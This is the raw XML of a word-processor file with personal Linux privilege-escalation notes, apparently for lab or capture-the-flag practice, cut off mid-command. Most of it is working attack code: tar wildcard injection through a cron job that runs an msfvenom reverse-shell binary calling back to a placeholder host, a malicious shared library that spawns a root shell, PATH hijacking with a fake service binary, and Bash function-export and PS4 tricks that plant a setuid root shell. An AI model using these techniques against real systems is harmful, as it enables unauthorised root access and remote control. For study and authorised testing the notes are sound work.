      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (and google) for ways exploit this using command line options. This means create </w:t>
      </w:r>
      <w:r w:rsidR="00E41059">
        <w:t>files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00E41059">
        <w:t>writable PATH directory (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E41059">
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E41059">
        <w:t xml:space="preserve"> /home/user)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E41059">
        <w:t xml:space="preserve">with the name being what * should be replaced with. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E41059">
        <w:t>E.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61782054" w14:textId="785EF9A9" w:rsidR="00E41059" w:rsidRDefault="00E41059" w:rsidP="00CB2C86">
      <w:r>
        <w:t>Cron job has this line in it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9CD0B0" w14:textId="4CB0D0D9" w:rsidR="00E41059" w:rsidRDefault="00E41059" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Tar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>czf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/backup.tar.gz *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3648E29C" w14:textId="6843D52B" w:rsidR="00E41059" w:rsidRDefault="00E41059" w:rsidP="00CB2C86">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gtfobins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gives us this to spawn a shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF55C82" w14:textId="77777777" w:rsidR="00E41059" w:rsidRDefault="00E41059" w:rsidP="00E41059">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF4F4"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="BF0707"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF4F4"/>
        </w:rPr>
        <w:t>tar -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="BF0707"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF4F4"/>
        </w:rPr>
        <w:t>cf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="BF0707"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF4F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="BF0707"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF4F4"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D55CB69" w14:textId="2B988F67" w:rsidR="00E41059" w:rsidRDefault="00E41059" w:rsidP="00CB2C86"/>
    <w:p w14:paraId="16C23A50" w14:textId="0B114C1D" w:rsidR="00E41059" w:rsidRDefault="00E41059" w:rsidP="00CB2C86">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we need to create three files in /home/user. One is a reverse shell binary created with </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A1AF48" w14:textId="2CB7EA18" w:rsidR="00E41059" w:rsidRDefault="00E41059" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="606666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F7F7"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="606666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F7F7"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="606666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F7F7"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="606666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F7F7"/>
        </w:rPr>
        <w:t>/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="606666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F7F7"/>
        </w:rPr>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="606666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F7F7"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f elf &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="606666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F7F7"/>
        </w:rPr>
        <w:t>reverse.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2884C245" w14:textId="46C11315" w:rsidR="00517B0E" w:rsidRDefault="00E41059" w:rsidP="00CB2C86">
      <w:r>
        <w:t>and the two with the names of command line options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7805EAF6" w14:textId="6249ECA0" w:rsidR="00E41059" w:rsidRDefault="00E41059" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>touch .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/--checkpoint=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4907B44E" w14:textId="52023B74" w:rsidR="00E41059" w:rsidRDefault="00E41059" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>touch .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/--checkpoint-action</w:t>
      </w:r>
      <w:r w:rsidR="001C203F">
        <w:t>=exec=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001C203F">
        <w:t>reverse.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3AAFC222" w14:textId="6EA33729" w:rsidR="001C203F" w:rsidRDefault="001C203F" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">Then listen on kali and wait for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> job to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06880ABF" w14:textId="74259E9B" w:rsidR="001C203F" w:rsidRPr="001C203F" w:rsidRDefault="001C203F" w:rsidP="00CB2C86">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C203F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SUID/SGID executables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (interesting files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6B173D" w14:textId="64183797" w:rsidR="008264D1" w:rsidRPr="008264D1" w:rsidRDefault="008264D1" w:rsidP="00CB2C86">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008264D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Binary exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B78EF0" w14:textId="25CCC33F" w:rsidR="001C203F" w:rsidRDefault="001C203F" w:rsidP="00CB2C86">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> presents these</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3FEB2A" w14:textId="1F101DD9" w:rsidR="001C203F" w:rsidRDefault="001C203F" w:rsidP="00CB2C86">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4855D610" wp14:editId="1486F269">
            <wp:extent cx="5731510" cy="329946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E7461" w14:textId="6990F9CC" w:rsidR="005B627C" w:rsidRDefault="001C203F" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">Look on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gtfobins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to see if any of the known binaries have exploits. For unknown binaries, find the version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CBFBFF" w14:textId="0B46F0CE" w:rsidR="001C203F" w:rsidRDefault="001C203F" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
        <w:t>FULLPATH –version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DE1BDF" w14:textId="232F3C16" w:rsidR="001C203F" w:rsidRDefault="001C203F" w:rsidP="00CB2C86">
      <w:r>
        <w:t>Then look for exploits on the usual places.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6620DD26" w14:textId="78D71E0F" w:rsidR="008264D1" w:rsidRDefault="008264D1" w:rsidP="00CB2C86">
      <w:r>
        <w:t>I that doesn’t work, try to execute the unknown binaries to see what they do and continue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9093A0" w14:textId="092F8262" w:rsidR="008264D1" w:rsidRPr="008264D1" w:rsidRDefault="008264D1" w:rsidP="00CB2C86">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008264D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shared object injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46168596" w14:textId="09612194" w:rsidR="001C203F" w:rsidRDefault="008264D1" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to see if possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171FEAA1" w14:textId="5046969B" w:rsidR="008264D1" w:rsidRDefault="008264D1" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Strace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> FULLPATH 2&gt;&amp;1 |grep -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>open|access|no</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> such file”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725C4A9B" w14:textId="398734F3" w:rsidR="008264D1" w:rsidRDefault="008264D1" w:rsidP="00CB2C86">
      <w:r>
        <w:t>If it tries to load a shared object (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> libcalc.so) from a writable directory, we can create it (and directories if needed). The (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libcalc.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) file should have the following contents which just spawns a shell when loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0003D1FE" w14:textId="77777777" w:rsidR="008264D1" w:rsidRDefault="008264D1" w:rsidP="008264D1">
      <w:r>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdlib.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9BB938" w14:textId="77777777" w:rsidR="008264D1" w:rsidRDefault="008264D1" w:rsidP="008264D1">
      <w:r>
        <w:t xml:space="preserve">static void </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>hijack(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) __attribute__((constructor));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1D58CF" w14:textId="77777777" w:rsidR="008264D1" w:rsidRDefault="008264D1" w:rsidP="008264D1">
      <w:r>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>hijack(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unsetenv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“LD_LIBRARY_PATH”);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setresuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(0,0,0);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        system(“/bin/bash -p”);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E59399B" w14:textId="6DBD7FCA" w:rsidR="008264D1" w:rsidRDefault="008264D1" w:rsidP="00CB2C86">
      <w:r>
        <w:t>Then compile it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DC5B40" w14:textId="59FC5857" w:rsidR="008264D1" w:rsidRDefault="008264D1" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ishared</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fPIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -o libcalc.so </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libcalc.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40D5E93B" w14:textId="5289035E" w:rsidR="008264D1" w:rsidRDefault="008264D1" w:rsidP="00CB2C86">
      <w:r>
        <w:t>Then execute the binary and gain root shall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D530AA8" w14:textId="67D0BBA3" w:rsidR="008264D1" w:rsidRPr="00FA7E72" w:rsidRDefault="008264D1" w:rsidP="00CB2C86">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA7E72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PATH environment variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBB3D65" w14:textId="4EF09D10" w:rsidR="008264D1" w:rsidRDefault="00FA7E72" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">The unknown binaries may be calling other processes which can be used to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. View the contents of the binary to see if it is executing/starting another service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC64174" w14:textId="75A46655" w:rsidR="00FA7E72" w:rsidRDefault="00FA7E72" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
        <w:t>Strings FULLPATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF6BD85" w14:textId="623EE0D7" w:rsidR="00FA7E72" w:rsidRDefault="00FA7E72" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">Confirm with </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21447073" w14:textId="2D9E0448" w:rsidR="00FA7E72" w:rsidRDefault="00FA7E72" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Strace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -v -f -e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/local/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>suid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-env 2&gt;&amp;1 | grep service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22171321" w14:textId="03916759" w:rsidR="00FA7E72" w:rsidRDefault="00FA7E72" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">If the service command is being executed via a shell and </w:t>
      </w:r>
      <w:r w:rsidR="000C7912">
        <w:t>service is not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> an absolute path, create a file called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>service.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B301F8" w14:textId="669BC7E6" w:rsidR="00FA7E72" w:rsidRDefault="00FA7E72" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
        <w:t>int main {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>0);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>system(“/bin/bash -p”);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0150C11D" w14:textId="7ED000A2" w:rsidR="00FA7E72" w:rsidRDefault="00FA7E72" w:rsidP="00CB2C86">
      <w:r>
        <w:t>Then compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB55226" w14:textId="1FC24D2E" w:rsidR="00FA7E72" w:rsidRDefault="00FA7E72" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -o service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>service.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C17B12D" w14:textId="78530D51" w:rsidR="00FA7E72" w:rsidRDefault="00FA7E72" w:rsidP="00CB2C86">
      <w:r>
        <w:t>Then prepend current directory to PATH and run the binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2532DBA8" w14:textId="11090E57" w:rsidR="00FA7E72" w:rsidRDefault="00FA7E72" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
        <w:t>PATH=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>PATH FULLBINARYPATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534E2C41" w14:textId="76C37633" w:rsidR="008264D1" w:rsidRPr="00FA7E72" w:rsidRDefault="00FA7E72" w:rsidP="00CB2C86">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA7E72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Abusing shell features (Bash &lt;</w:t>
      </w:r>
      <w:r w:rsidR="000C7912">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7E72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2-048)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10326854" w14:textId="4ECEC2B8" w:rsidR="00FA7E72" w:rsidRDefault="000C7912" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">If the above wont work because the service is an absolute path, then try this. Find the version of the shell executing the service command, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D10E15C" w14:textId="34EE8217" w:rsidR="000C7912" w:rsidRDefault="000C7912" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482204E5" w14:textId="5EF8485F" w:rsidR="000C7912" w:rsidRDefault="000C7912" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">If Bash version &lt; 4.2-048, then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FD5FC4" w14:textId="098A08D5" w:rsidR="000C7912" w:rsidRDefault="000C7912" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Function SERVICEABSOLUTEPATH </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>{ /</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>bin/bash -p; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F819A44" w14:textId="212DB08B" w:rsidR="000C7912" w:rsidRDefault="000C7912" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
        <w:t>Export -f SERVICEABSOLUTEPATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DA7A84" w14:textId="31CF5739" w:rsidR="000C7912" w:rsidRDefault="000C7912" w:rsidP="00CB2C86">
      <w:r>
        <w:t>Then execute the binary and get root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A51F547" w14:textId="258B9442" w:rsidR="000C7912" w:rsidRPr="000C7912" w:rsidRDefault="000C7912" w:rsidP="00CB2C86">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7912">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Abusing shell features</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Bash &lt; 4.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAFEEE5" w14:textId="1A7DD3F8" w:rsidR="008264D1" w:rsidRDefault="000C7912" w:rsidP="00CB2C86">
      <w:r>
        <w:t>If Bash version &lt; 4.4, then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683987A4" w14:textId="16578B83" w:rsidR="000C7912" w:rsidRDefault="000C7912" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
        <w:t>Env -I SHELLOPTS=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xtrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PS4=’</w:t>
      </w:r>
      <w:r w:rsidR="00DE0A6B">
        <w:t>$(cp /bin/bash /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE0A6B">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE0A6B">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE0A6B">
        <w:t>rootbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE0A6B">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE0A6B">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE0A6B">
        <w:t xml:space="preserve"> +s /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE0A6B">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE0A6B">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
